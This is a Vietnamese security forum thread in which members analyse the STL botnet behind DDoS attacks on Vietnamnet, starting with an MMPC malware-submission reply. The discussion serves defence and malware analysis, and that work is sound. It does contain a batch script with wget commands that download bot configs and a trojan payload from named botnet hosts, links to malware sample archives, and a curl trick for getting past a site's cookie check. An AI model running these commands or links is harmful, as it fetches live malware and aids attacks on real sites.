Analysis of the file(s) in Submission ID MMPC11082667068256 is now complete. This is the final email that you will receive regarding this submission. The Microsoft Malware Protection Center (MMPC) has investigated the following file(s) which we received on 8/25/2011 9:11:19 PM Pacific Time. Below is the determination for your submission. ======== Submission ID MMPC11082667068256 Submitted Files ============================================= IAStore_26_08_2011.zip [Not Malware] +---SmartPin.dll [Not Malware] +---IAStorUIHelper.dll [Not Malware] +---SysInftLib.dll [Not Malware] +---IAStorCommon.dll [Not Malware] +---IAStorDataMgrSvc.exe [Not Malware] +---IAStorDataMgr.dll [Not Malware] Your submission was scanned using antimalware definition version 1.111.798.0. ======== The detections listed above are included in the latest pre-release definition available for download. For more information please visit the pre-release definition update download page available at: http://www.microsoft.com/security/portal/Shared/PreReleaseSignatures.aspx Alternatively, detections listed above will be available for users who subscribe to the automatic definition update mechanism in the next regularly scheduled release, as well as users who choose to manually update their definition library available via the MMPC Portal available on: http://www.microsoft.com/security/portal/Definitions/ADL.aspx If you have questions relating to this submission please contact mailto:mmpcres@microsoft.com and reference your submission ID. We would like to find ways to improve our service to you. Please take a few minutes and fill out our short customer survey for this incident. You can navigate to our short (6 question) survey here: http://www.zoomerang.com/Survey/WEB22CHRC7QCL5/ ============================================= Additional Help For customers who do not have an antivirus solution, Microsoft Security Essentials can be downloaded at no charge here: http://www.microsoft.com/security_essentials/ For more information about updating definitions and answers to other questions, visit the following link: http://www.microsoft.com/security/portal/Shared/Help.aspx#new_defns If you need immediate assistance and information on best practices for removing malware in your environment, additional support options are available at the following websites: For IT Professionals - http://support.microsoft.com/gp/securityitpro For Home Users - http://support.microsoft.com/default.aspx?pr=securityhome Thank you, Microsoft Malware Protection Center

Phân tích tính chất vài trận DDoS HVA vừa qua.

hailua_online — GMT

TQN wrote:

Kinh thật, code khá lắm, 1 file exe đăng ký run như 1 service, 5 file dll, mỗi thằng 1 nhiệm vụ khác nhau. Thằng làm trách nhiệm download là thằng IAStoreUIHelp.dll. Tất cả chúng phối hợp nhuần nhuyễn với nhau. Bạn 1visao có nhớ là tại sao, khi nào, download cái gì mà máy trên công ty này của bạn bị dính đám mạo danh IAStore này không ? Bà con ơi, tiếp tục up mẫu thôi. Toàn bộ đống mạo danh IAStore này em đã up ở đây: http://www.mediafire.com/?wv13bdoc4g8f905 Bà con phụ một tay up mẫu cho AVs nhé. Giờ em đi ăn sáng, uống cafe lấy sức đã, tối qua thức tới 3h. Ngày nay lại ngồi lỳ ở nhà nữa rồi, cúp đt thôi. À sẵn tiện nhờ bà con tư vấn cái: vốn em rất lạc hậu về công nghệ, cái máy em đang dùng đây đã gần 10 năm rồi, mua từ 2002, giờ nó tàn và cùi bắp lắm, mới thay bộ nguồn mà ưng là nó restart cái bụp (xe em đi đã 12 năm rồi thì sao, từ thời còn sv hàn vi). Em "phải" mua 1 cái laptop thôi, đi đâu mang theo, chớ ngồi ở nhà hoài bỏ công bỏ việc hết. Bà con biết chổ nào bán máy laptop xài được, màn hình to to, bàn phím bự bự, chất lượng, giá cã phù hợp giới thiệu em một cái. Không cần mạnh đâu, chỉ cần lướt web, vào HVA post bài, theo dõi giá vàng và RCE, code bậy bạ thôi. Cảm ơn trước nhé !

Bác TQN ơi bác hình như không có làm về IT thì phải mà bác lại thừa kiến thức và trình độ để làm IT hay là bác đổi cho e tí kiến thức của bác rồi e đổi lap cho bác để e đi làm cho đỡ vất vả ko cứ đi phụ hồ thì mệt lắm :d

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Chiều nay, nghỉ RCE, đi nhậu với thằng em rể. Vài lời với mấy anh em stl: Tôi, anh em HVA này, và các bạn, toàn là người Việt thôi. Tại sao phải đấu đá với nhau làm gì ???? Em biết mấy anh cũng có nổi khổ của mấy anh, đã là sống chết theo lệnh rồi thì mấy anh, cũng chỉ là những người làm công ăn lương thôi, bị lệnh từ sếp ở trên ban xuống, phải gồng mình mà cố gắng lỳ lợm, trơ gan ra để hoàn thành lệnh sếp giao. Nhưng em cũng thừa biết mấy anh cũng phải miễn cưỡng mà làm thôi, vì miếng cơm manh áo, tiền bạc, gạo tiền, vợ con, gia đình thôi, phải không mấy anh em stl. Mấy anh em cũng giỏi lắm, em phải khen, rất giỏi (em chưa từng khen ai cả trong IT). Nhưng mấy anh ơi, quay đầu là bờ, mình phải cam tâm làm tay sai cho tàu khựa, bán nước, phản động, hại đồng loại của mình tới bao giờ nữa ??? Em mong mấy anh hảy bình tâm suy nghĩ lại đi ! Tới chiều nay, em chợt nghĩ lại, em tự nhiên thấy thương mấy anh quá, cùng là người Việt, cùng là dân IT với nhau, chỉ vì mấy thằng sếp bán nước mà anh em ta phải quay ra đấu đá lẫn nhau, truy cùng đuổi tận. Nếu lỡ có chuyện gì, thì chỉ mấy anh em ta là con tốt thí mạng, vắt chanh bỏ vỏ mà thôi. Chỉ nên chữi mấy thằng tàu nham hiểm, thâm độc đang nắm đầu mấy sếp của tụi anh thôi. Vài lời chân tình, mong mấy anh em stl hiểu giùm tôi. Lần này, tôi nói rất chân tình, mong mấy anh em stl hiểu ! Mấy anh em nên nhớ, chúng ta cùng là người Việt, cùng nòi giống con Rồng cháu Tiên nhé. Hảy suy nghĩ lại đi, mấy anh em stl của tôi ơi ! Hảy cùng nhau phản đối, kiến nghị, đình công, biểu tình... lên mấy sếp của mấy anh, dừng ngay các hành động phạm pháp, xấu xa, đồi bại này lại. Em biết, chính quyền nào cũng có những tổ chức như mấy anh, nhưng đừng làm quá lắm. Mục tiêu "ổn định chính trị" của mấy anh, em công nhận là đúng, nhưng đừng dùng những hành động phạm pháp, đê hèn, xấu xa như vậy. Nếu không vì những hành động ấy, đường anh anh đi, đường em em đi. Em nói vậy mấy anh stl có hiểu không ?

Tội nghiệp TQN. Trên thế gian này có ba loại người: 1. Loại có trí tuệ và có liêm sỉ. 2. Loại không có trí tuệ nhưng có liêm sỉ. 3. Loại có trí tuệ nhưng không có liêm sỉ. Những con người có liêm sỉ thường không cần được khuyên bảo hoặc chỉ cần nói một lần là xong. Riêng với những con người không có liêm sỉ thì có chẻ đầu ra đổ vào hàng xe tải lời khuyên cũng vô ích bởi vì thiểu liêm sỉ thì thiếu chất xúc tác để dung nạp lẽ phải, để tiếp nhận cái thiện. Huống hồ chi, "sống chết theo lệnh" thì lại càng khó mà nói chuyện phải quấy. Một vết thương ung mủ không mổ xẻ ra để rửa cho sạch vi trùng mà che đậy để "ổn định" thì chẳng mấy chốc nó sẽ lan ra và sẽ làm hoại thư cả một cơ thể. Trên thế gian này, từ cổ chí kim, sự thật luôn luôn tồn tại.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Dpm — GMT

Vừa bật máy ảo XP lên,lại thấy đang oánh vietnamnet tiếp,mấy bác vnn hình như k có động thái gì.Nếu các bác có vấn đề về kỹ thuật,sao không nhờ các admin hva hỗ trợ??hay có một lý do gì khó nói,ai lại để tình trạng này suôt thời gian dài nv.

Phân tích tính chất vài trận DDoS HVA vừa qua.

learningandlearning — GMT

Có sự thay đổi dung lượng file: Các file 15 KB trước kia giờ thành 13KB

http://www.mediafire.com/download.php?ns3esc307tjczkc

Phân tích tính chất vài trận DDoS HVA vừa qua.

tranhuanltv — GMT

IAStore_26_08_2011.zip mẫu của anh TQN gửi Avira cũng cho là sạch luôn :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o — GMT

tranhuanltv wrote:

IAStore_26_08_2011.zip mẫu của anh TQN gửi Avira cũng cho là sạch luôn :D

Ủa sao kì vậy ta? Theo như những comment ở trang trước thì mấy file này đã bị avira lụm trước đây vài ngày rồi mà ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

dinhvandinhtu — GMT

conmale wrote:

TQN wrote:

Chiều nay, nghỉ RCE, đi nhậu với thằng em rể. Vài lời với mấy anh em stl: Tôi, anh em HVA này, và các bạn, toàn là người Việt thôi. Tại sao phải đấu đá với nhau làm gì ???? Em biết mấy anh cũng có nổi khổ của mấy anh, đã là sống chết theo lệnh rồi thì mấy anh, cũng chỉ là những người làm công ăn lương thôi, bị lệnh từ sếp ở trên ban xuống, phải gồng mình mà cố gắng lỳ lợm, trơ gan ra để hoàn thành lệnh sếp giao. Nhưng em cũng thừa biết mấy anh cũng phải miễn cưỡng mà làm thôi, vì miếng cơm manh áo, tiền bạc, gạo tiền, vợ con, gia đình thôi, phải không mấy anh em stl. Mấy anh em cũng giỏi lắm, em phải khen, rất giỏi (em chưa từng khen ai cả trong IT). Nhưng mấy anh ơi, quay đầu là bờ, mình phải cam tâm làm tay sai cho tàu khựa, bán nước, phản động, hại đồng loại của mình tới bao giờ nữa ??? Em mong mấy anh hảy bình tâm suy nghĩ lại đi ! Tới chiều nay, em chợt nghĩ lại, em tự nhiên thấy thương mấy anh quá, cùng là người Việt, cùng là dân IT với nhau, chỉ vì mấy thằng sếp bán nước mà anh em ta phải quay ra đấu đá lẫn nhau, truy cùng đuổi tận. Nếu lỡ có chuyện gì, thì chỉ mấy anh em ta là con tốt thí mạng, vắt chanh bỏ vỏ mà thôi. Chỉ nên chữi mấy thằng tàu nham hiểm, thâm độc đang nắm đầu mấy sếp của tụi anh thôi. Vài lời chân tình, mong mấy anh em stl hiểu giùm tôi. Lần này, tôi nói rất chân tình, mong mấy anh em stl hiểu ! Mấy anh em nên nhớ, chúng ta cùng là người Việt, cùng nòi giống con Rồng cháu Tiên nhé. Hảy suy nghĩ lại đi, mấy anh em stl của tôi ơi ! Hảy cùng nhau phản đối, kiến nghị, đình công, biểu tình... lên mấy sếp của mấy anh, dừng ngay các hành động phạm pháp, xấu xa, đồi bại này lại. Em biết, chính quyền nào cũng có những tổ chức như mấy anh, nhưng đừng làm quá lắm. Mục tiêu "ổn định chính trị" của mấy anh, em công nhận là đúng, nhưng đừng dùng những hành động phạm pháp, đê hèn, xấu xa như vậy. Nếu không vì những hành động ấy, đường anh anh đi, đường em em đi. Em nói vậy mấy anh stl có hiểu không ?
Tội nghiệp TQN. Trên thế gian này có ba loại người: 1. Loại có trí tuệ và có liêm sỉ. 2. Loại không có trí tuệ nhưng có liêm sỉ. 3. Loại có trí tuệ nhưng không có liêm sỉ. Những con người có liêm sỉ thường không cần được khuyên bảo hoặc chỉ cần nói một lần là xong. Riêng với những con người không có liêm sỉ thì có chẻ đầu ra đổ vào hàng xe tải lời khuyên cũng vô ích bởi vì thiểu liêm sỉ thì thiếu chất xúc tác để dung nạp lẽ phải, để tiếp nhận cái thiện. Huống hồ chi, "sống chết theo lệnh" thì lại càng khó mà nói chuyện phải quấy. Một vết thương ung mủ không mổ xẻ ra để rửa cho sạch vi trùng mà che đậy để "ổn định" thì chẳng mấy chốc nó sẽ lan ra và sẽ làm hoại thư cả một cơ thể. Trên thế gian này, từ cổ chí kim, sự thật luôn luôn tồn tại.

Chào các anh em trên HVA, chào anh TQN, anh PXMMRF, anh conmale và các anh em trong BQT HVA , em theo dõi quá trình phân tích mẫu của các anh từ rất lâu rồi. Từ lúc anh TQN còn "RCE đám virus của STL", lúc đó em cũng chỉ tò mò xem cho biết. Nhưng dần dần thì sự việc lại càng mở rộng. Ngày nào em cũng lên HVA để đọc những phân tích của các anh, những comment của các mem (em đang học an ninh mạng nhưng còn gà con nên ko dám lên tiếng :( ). Và em nghĩ cũng có nhiều anh em có sở thích như em, chỉ đọc mà ko nói câu nào.! Em nghĩ các anh cũng mệt mỏi với việc này lắm rồi, nếu là em thì em cũng sẽ rất mệt mỏi. Em thật sự khâm phục các anh, niềm đam mê IT trong các anh rất lớn thì các anh mới có thể theo đuổi đến lúc này. Em rất muốn chia sẻ cùng các anh nhưng ko biết làm sao vì trình độ em còn kém lắm. Lời cuối em xin chân thành cảm ơn các anh, anh TQN, anh PXMMRF, anh conmale và các anh em HVA. Chúc các anh luôn khoẻ mạnh.

Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 — GMT

Em nghĩ đám bot được phát tán chủ yếu qua các phần mềm crack, mà dân VN là chuyên gia xài đồ crack. Em có một thắc mắc là có khi nào windows lậu có chứa trojan không, nếu có thì sẽ vô cùng nguy hiểm vì đa số người VN xài windows lậu :|

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

conmale wrote:

Tội nghiệp TQN. Trên thế gian này có ba loại người: 1. Loại có trí tuệ và có liêm sỉ. 2. Loại không có trí tuệ nhưng có liêm sỉ. 3. Loại có trí tuệ nhưng không có liêm sỉ. Những con người có liêm sỉ thường không cần được khuyên bảo hoặc chỉ cần nói một lần là xong. Riêng với những con người không có liêm sỉ thì có chẻ đầu ra đổ vào hàng xe tải lời khuyên cũng vô ích bởi vì thiểu liêm sỉ thì thiếu chất xúc tác để dung nạp lẽ phải, để tiếp nhận cái thiện. Huống hồ chi, "sống chết theo lệnh" thì lại càng khó mà nói chuyện phải quấy. Một vết thương ung mủ không mổ xẻ ra để rửa cho sạch vi trùng mà che đậy để "ổn định" thì chẳng mấy chốc nó sẽ lan ra và sẽ làm hoại thư cả một cơ thể. Trên thế gian này, từ cổ chí kim, sự thật luôn luôn tồn tại.

Em xin bổ sung : 4. Loại không có trí tuệ và không có liêm sỉ. và "Trên thế gian này, từ cổ chí kim, sự thật luôn luôn tồn tại và chỉ có một mà thôi"

Phân tích tính chất vài trận DDoS HVA vừa qua.

template — GMT

sao bây giờ vào hva nó trỏ sang đường dẫn này : /null/

Phân tích tính chất vài trận DDoS HVA vừa qua.

cayaoanh830 — GMT

Em mới làm 1 cái chương trình để Download và so sánh mấy file _index chưa Decode tự động. Mấy anh xem có dùng được không em chỉ làm thử thôi và chưa thử nghiệm nhiều lần nên chắt sẽ có nhiều sai sót. http://www.mediafire.com/download.php?lx4jr26b21k92w6 Trong đó em có lấy code download mấy file của anh TQN mong anh không phiền.

Phân tích tính chất vài trận DDoS HVA vừa qua.

duvanngoc — GMT

Vào check digital sig trong properties của win 7 lại không thấy có nhỉ nên gửi các bác 2 file MsHelpCenter.exe và MsHelpCenter.idx để các bác check hộ. Tự dưng hôm nay thấy kis báo malware. http://cC1.upanh.com/27.275.34538480.F8s0/malware.jpg http://www.mediafire.com/?7cukz26mrh2py9s Pass: hva Àh, sau khi kis báo cái, mình vào theo đường dẫn thì có 3 file thêm thằng MsHelpCenter.old, file này khi mình nén lại bị kis diệt luôn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

xsecure — GMT

Mấy hôm nay có lúc vào hva khó khăn,có lúc không vào được. là người thích IT,cũng đang tập tành học hỏi IT nên theo dỏi chủ đề này rất thú vị."STL" hay "TQN" hay ai đó ở HVA đều có lý tưởng của mình.chỉ khác là chính hay tà.chính hay tà còn tuỳ vào người đọc,nghe hay cảm nhận nữa.người bảo thủ luôn cho mình là chính còn đối lập với mình là tà. mặc dù pháp luật có khe hở nhưng không thể dựa vào đó để làm chuyện sai quấy(ai cung thấy rỏ).đó không thể là lòng yêu nước,yêu "gì đó"....mà đó là phạm pháp.sống ở đâu cũng có pháp luật hoặc luật lệ và con người phải tôn trọng nó,đó chính là tôn trọng chính mình (ý chủ quan của tôi). việc anh em HVA đã làm là điều đáng ngưỡng mộ.(không ngại bị xâm phạm đời tư,nói xấu,hăm doạ...). 1 tổ chức đối chọi với cá nhân hoặc vài cá nhân thì không cân bằng.nhưng các anh đã tự ân bằng nó.tôi rất ngưỡng mộ các anh. @conmale trước đây tôi đã có ý nghĩ xấu về anh.thành thật xin lỗi. trong cái "chân chân gia gia" sự thật luôn là sự thật.sự thật có thể là tà và củng có thể là chính.đó là 2 mặt của 1 tờ giấy.

Phân tích tính chất vài trận DDoS HVA vừa qua.

haphan87 — GMT

Hi anh TQN và conmale Em tham gia HVA lâu mà ko post bài, theo dõi từ đợt anh re BKAV xài winrar đến lần gần đây là re đám mèo của bọn STL. Ngưỡng mộ các anh nhiều lắm. Theo như em nhận định thì việc đính mèo vào soft diễn ra vẫn còn rất nhiều. Hôm nay em goolge sơ sơ ra cái link này (nằm trong trang thứ 2 của từ khóa "bộ ngõ tiếng việt") Code:

http://hanviquan.forumvi.com/t370-topic

trong đó chứa link tới file unikey trên mediafire (hình như đa số virus dc up lên mediafire) --> Code:

http://www.mediafire.com/?k1i01ry314xb97h

file này em chỉ up lên thử virustotal thì 4 thằng detect là malware. Các anh ngó sơ xem chúng có thuộc variant của nào của STL hay không thì theo em thấy như các anh nói trong HVA, vẫn tồn tại một số mẫu botnet khác nữa. Khi thử post cái từ khóa "http://www.mediafire.com/?k1i01ry314xb97h" lên google thì hiện tại có những 79 trang link đến cái file virus này. Trong đó có cả 1 trang diễn đàn của bkav. Chúc các anh chân cứng đá mềm.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Sáng nay vô thử vietnamnet thì vẫn tràn ngập trong "biển lửa". Tất cả các trang mạng thuộc vietnamnet đều chập chờn và đa số là bị lỗi 404. Hôm trước có vô được nhưng cực kỳ chậm. Điều này chứng tỏ cho đến nay vietnamnet vẫn còn bị tấn công nặng nề, thậm chí còn nặng nề hơn mấy hôm trước. stl botnet vẫn tiếp tục "crawl" (dựa thông tin lấy từ con vmware đang chạy thử) và dường như vietnamnet ứng dụng javascript để wwwect nhưng chỉ thuần tuý wwwecting nhưng không kiểm soát cụ thể cái gì được wwwect và cái gì không được wwwect. Hơn nữa, botnet của stl đập thẳng vô những trang chính của của vietnamnet và sau đó tiếp tục "crawl" thì không có cách gì đỡ nổi. Về mặt pháp lý, lẽ nào một trang web lớn như vietnamnet, một trong những cơ quan ngôn luận của nhà nước mà vẫn bó tay thúc thủ? Thông tin reverse đã được anh em ở HVA công bố quá đầy đủ. Các cơ quan chức năng thừa sức mạnh để làm việc xuyên qua những channel chính thức để thộp cổ bọn tội phạm này. Nếu chuyện tường lửa đã được áp dụng để cản đến mức độ từng blog mà không thể dùng tường lửa để cản các master bots thì đây quả là chuyện kỳ lạ.

Phân tích tính chất vài trận DDoS HVA vừa qua.

o.O.o — GMT

Sáng em vào thử vietnamnet.vn (29-08-2011 7:22 PM) tốc độ truy cập rất nhanh, gõ enter xong là ra ngay, chắc đang ngưng ddos rồi

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

o.O.o wrote:

Sáng em vào thử vietnamnet.vn (29-08-2011 7:22 PM) tốc độ truy cập rất nhanh, gõ enter xong là ra ngay, chắc đang ngưng ddos rồi

Còn tớ thì thử 3 IP từ 3 quốc gia Úc, Nhật, Đức để truy cập vietnamnet hoàn toàn không được. Có lẽ vietnamnet block trọn bộ IP nước ngoài hay sao đây.

Phân tích tính chất vài trận DDoS HVA vừa qua.

haphan87 — GMT

conmale wrote:

Còn tớ thì thử 3 IP từ 3 quốc gia Úc, Nhật, Đức để truy cập vietnamnet hoàn toàn không được. Có lẽ vietnamnet block trọn bộ IP nước ngoài hay sao đây.

Có vẻ là Vietnamnet block hết mạng ngoài VN hay sao ấy, mình cũng không vào được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Dpm — GMT

Vietnamnet đang dùng kỹ thuật kiểm tra cookie,nếu anh chưa vào vnn lần nào,hoặc anh vào rồi nhưng xoá cookie đi thi cũng không thể vào đc nữa,giá trị của cookie là bất kỳ,miễn là có cookie,nếu a k vào đc,hãy add một cookie bất kỳ vào trình duyệt,hoặc thử: `curl http://vietnamnet.vn/vn/index.html` thì chết nhưng `curl -b "a=b" http://vietnamnet.vn/vn/index.html` thì vào đc,kỹ thuật này có vể không ok cho lắm,botnet có thể thêm cookie_header dễ dàng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

conmale wrote:

Sáng nay vô thử vietnamnet thì vẫn tràn ngập trong "biển lửa". Tất cả các trang mạng thuộc vietnamnet đều chập chờn và đa số là bị lỗi 404. Hôm trước có vô được nhưng cực kỳ chậm. Điều này chứng tỏ cho đến nay vietnamnet vẫn còn bị tấn công nặng nề, thậm chí còn nặng nề hơn mấy hôm trước. stl botnet vẫn tiếp tục "crawl" (dựa thông tin lấy từ con vmware đang chạy thử) và dường như vietnamnet ứng dụng javascript để wwwect nhưng chỉ thuần tuý wwwecting nhưng không kiểm soát cụ thể cái gì được wwwect và cái gì không được wwwect. Hơn nữa, botnet của stl đập thẳng vô những trang chính của của vietnamnet và sau đó tiếp tục "crawl" thì không có cách gì đỡ nổi. Về mặt pháp lý, lẽ nào một trang web lớn như vietnamnet, một trong những cơ quan ngôn luận của nhà nước mà vẫn bó tay thúc thủ? Thông tin reverse đã được anh em ở HVA công bố quá đầy đủ. Các cơ quan chức năng thừa sức mạnh để làm việc xuyên qua những channel chính thức để thộp cổ bọn tội phạm này. Nếu chuyện tường lửa đã được áp dụng để cản đến mức độ từng blog mà không thể dùng tường lửa để cản các master bots thì đây quả là chuyện kỳ lạ.

Thực ra nó lạ mà không lạ, lạ vì bị "đánh đập bầm dập", biết thằng nào đánh mà không dám lên tiếng. Không lạ vì nó là thực tế của nhiều sự việc ở Vietnam hiện nay. :( Việc Vietnamnet bị DDOS nặng nề, chỉ cần họ HO một tiếng thôi (hướng dẫn cách thức kiểm tra máy có virus hoặc 1 cái tool remove các virus này) thì chắc sức lan toả tới cộng đồng sẽ rất lớn. Mấy chục báo mạng đưa tin lại, thì virus này sẽ bị tiêu diệt hoặc sống lay lắt mà thôi. :D Tốt hơn hết là họ nên có một chuyên mục phòng chống VIRUS, được thế thì bà con Việt mới được nhờ. Nhưng nếu lập ra chuyên mục này, khéo "họ" lại giết chính gà nhà của mình thì mệt =))

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Báo điện tử VietNamnet bị tấn công 16/08/2011 0:09 Từ khoảng 10 giờ sáng hôm qua 15.8, việc truy cập vào báo điện tử VietNamnet (VNN) tại địa chỉ vietnamnet.vn liên tục bị nghẽn. Phản hồi từ máy chủ của VNN rất chậm, lúc được lúc không và liên tục hiện ra thông báo “Server is too busy” (Máy chủ quá tải). Đến chiều tối cùng ngày, việc truy cập vẫn rất khó khăn. Ông Bùi Bình Minh, trợ lý Tổng biên tập VNN về công nghệ thông tin xác nhận, báo điện tử này bị tấn công DDOS (từ chối dịch vụ) ở cấp độ nhẹ. “Có khả năng đây là các tàn dư của các mạng botnet cũ được lập trình từ trước đó đến “hẹn” lại phát động tấn công chứ không hẳn là tấn công có chủ ý. Mức độ tấn công cũng không lớn”, ông Minh cho biết. Trường Sơn http://www.thanhnien.com.vn/Pages/20110816/Bao-dien-tu-VietNamnet-bi-tan-cong.aspx

Câu chuyện bi hài mà các bác không dám nói thật

Phân tích tính chất vài trận DDoS HVA vừa qua.

cayaoanh830 — GMT

Không biết là không ai xem các file hay không ai muốn nói, 4 file _index.txt đều có sự thay đổi mà không ai Reply hết: Trong đó file: pref.firebay.cn_index.txt bị đổi thành 0 Kb còn 3 file còn lại đổi thành 11 Kb. Sau khi chỉnh sửa 1 chút chương trình tự download và so sánh ở trên nên up lại: http://www.mediafire.com/download.php?w377gt143gab0aq Bây giời nó đã được chỉnh sửa để chạy thầm lặng không còn xuất hiện bảng dos nửa. PS: Sửa lại rồi nên không còn sử dụng code của anh TQN không sợ bị nói là đánh cắp bản quyền nữa hi hi hi...

Phân tích tính chất vài trận DDoS HVA vừa qua.

dracula_ — GMT

em mới phát hiện ra máy mình bị dính Ituneshelper.exe cũng vài ngày trước đây thôi trước đó thì chỉ bít là nó sử dụng đường truyền của em làm gì đó em không để ý lắm giờ em định sử dụng HDH linux của em để xoá (lâu nay em vẫn làm thế vì hok có xài chương trình diệt virus) Em muốn hỏi là có có cách nào gọn nhẹ xoá nó mà không ảnh hưởng đến hệ thống không. với lại có cần xoá gì nữa không vậy. cảm ơn

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Chỉ cần xoá nó rồi vào registry search ITunesHelper.exe rồi xoá đi. Vậy thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

dracula_ — GMT

ờ cái máy của em cũng có mấy file trong C:\Program Files\Common Files\Intel\Intel(R) Rapid Storage Technology được nhắc đến ở các trang trước thực sự thì nó có an toàn không vậy xoá nó thì có làm sao không. em muốn hỏi thêm làm sao xem được code của mấy cái file này hay vậy ( hỏi chỉ để cho bít thôi chứ không có mục đích gì khác :D).

Phân tích tính chất vài trận DDoS HVA vừa qua.

canh_nguyen — GMT

Tối lỡ uống gần 1 cốc đen đặc không ngủ được. Lên kéo cái autoit về viết cái toy trên windows chơi thử: http://www.mediafire.com/?ioyq3101k2l1rhm Chức năng là monit đống links trong file sotilon.txt, nếu sau có thêm link khác thì cứ add thêm vào dòng cuối. Nếu lần download sau có sự thay đổi sẽ ghi ngày giờ ra log file log.txt Bạn nào dùng windows thì lập cho file stl_mon.exe 1 cái schedule vài phút run 1 lần cho nó compare. Mình chưa test kĩ được, nếu ai dùng mà thấy có lỗi gì pm mình mình sửa :^) Trước cứ tưởng autoit chỉ để viết virus :P //tí quên, có 3 folder trong đó thì đừng del cái nào đi nhé các bạn. 1 cái để chứa file download lần trước, 1 cái để chứa file tạm cho việc compare, 1 cái để move file thay đổi vào.

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

Hi anh TQN: em chạy đoạn bat ở dưới sao không thấy gì hết anh, em thấy dòng cuối cùng có ghi là ấn phím bất kỳ để tiếp tục, thế là em ấn, cái bảng biến mất tiêu luôn anh. @echo off echo =============================================================================== echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet echo =============================================================================== echo. wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt wget -t3 "http://option.drfound.net/k113.css" pause Hi anh canh_nguyen: Em chạy file stl_mon.exe, MSE báo là k113[1].css là trojan. Sao vậy anh? Em không biết dán hình MSE báo là tronjan lên đây bắng cách nào, để anh và mọi người xem.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Đúng rồi đấy vndncn. Sáng nay tôi vừa nhận được mail phản hồi từ MSE. Họ đã xác định k113.css là trojan: https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=13A47553-F32A-4AC3-8497-E5C314EEE27E Rút kinh nghiệm, thay vì các bạn up các mẫu đang DDOS Vietnamnet cho các AVs bằng các website của họ, nếu kết quả của hệ thống phân tích tự động của họ trả về là clean, các bạn nên mail thẳng tới mail support của họ. Họ sẽ cử nhân viên manual analysis. Ví dụ, vừa qua, một guru khét tiếng của Kaspersky (kẻ mà hacker Nga rất ghét, rất nổi tiếng về malware analysis) đã có mail hồi báo cho tôi về các mẫu fake Sanboxie, fake Itunes, IAStore, thông báo kết quả manual analysis của ông ấy, và không thằng nào lọt sổ cả ;) Ông ta có nói họ đang theo dõi hệ thống botnet này. Tôi cũng đã gởi Fake ITunes và Fake IAStore cho bạn tôi ở Avira và MS.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

vndncn wrote:

Hi anh canh_nguyen: Em chạy file stl_mon.exe, MSE báo là k113[1].css là trojan. Sao vậy anh? Em không biết dán hình MSE báo là tronjan lên đây bắng cách nào, để anh và mọi người xem.

Báo trojan là đúng rồi, MSE phát hiện thì càng tốt chứ sao.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Mấy ngày hôm nay, lu bu nhiều chuyện, toàn chuyện không vui, trên trời rơi xuống, nên không tiếp tục RCE mẫu IAStore được. Bà con thông cảm ! Cũng mệt mỏi và chán nãn lắm, tính bỏ ngang, nhưng nghĩ lại: đã làm là phải làm cho trót, nếu bỏ ngang thì IAStore sẽ tiếp tục download bot mới của nó về, cập nhật và tiếp tục tấn công DDOS vào Vietnamnet. Mẫu ITunes thì gần như sắp bị die rồi, các AVs hầu hết đã cập nhật, mẫu IAStore thì cứ được báo về là "Clean". Đạo đức nghề nghiệp thằng "non-IT" như tui thấy không cho phép, thấy cái sai mà phải nhắm mắt làm ngơ thì ấm ức không chịu được. Hơn nữa, tự nhủ lương tâm là mình đang làm đúng, không cố ý cố tình hại ai cả, chỉ là vô tư, không vụ lợi, bỏ chút công sức "còm" để đóng góp một tay cho cộng đồng Internet Vietnam ta. Có lẽ từ trước tới giờ, mẫu ITStore này là mẫu khổng lồ nhất, phức tạp nhất mà tôi đã gặp. Code cực kỳ phức tạp, phân tách nhiệm vụ ra rõ ràng hết. Exe đăng ký run như một service, điều phối hoạt động của 5 dll còn lại. Mỗi dll một nhiệm vụ, dll đăng ký registry, đánh dấu lây nhiểm, 2 dll làm nhiệm vụ download, 1 dll làm nhiệm vụ giãi mã bước 1, 1 dll làm nhiệm vụ bước 2, giãi mã xong ghi xuống harddisk và run. Bản thân chúng nếu phân tách ra phân tích từng file thì thấy hầu như là file sạch, code VC++ 2010 bình thường, code rất trong sáng, không dùng một kỹ thuật AntiRCE, antiAV, antiVM... gì cả. Nhưng nối chúng lại với nhau, tập trung ở đầu ra cuối cùng của chúng sẽ thấy. Coder của con bot này lần này dùng hoàn toàn thư viện CryptoPP: http://www.cryptopp.com, bản mới nhất để làm nhiệm vụ encrypt các link download và để giải mã file malware download về. Và lại dùng toàn CString class của ATLMFC VC++ 2010 để làm các nhiệm vụ thao tác chuỗi (string). Static analysis hoàn toàn rất tốn công sức, vì vậy tôi chỉ tập trung vào debug là chính. Con IAStore này cũng mắc lỗi như tôi đã nói lúc trước: 1. Vẫn tìm nhiều cách mã hoá các string quan trọng, nhưng tới thời điểm call API của socket API thì vẫn phải lòi ra clear text. 2. Vẫn dùng cách: giã mã file malware xong, ghi xuống %Temp% rồi CreateProcessA/W, cập nhật nó xong rồi nó mới bị xoá : DeleteFileA, DeleteFileW. Một ít miêu tã: 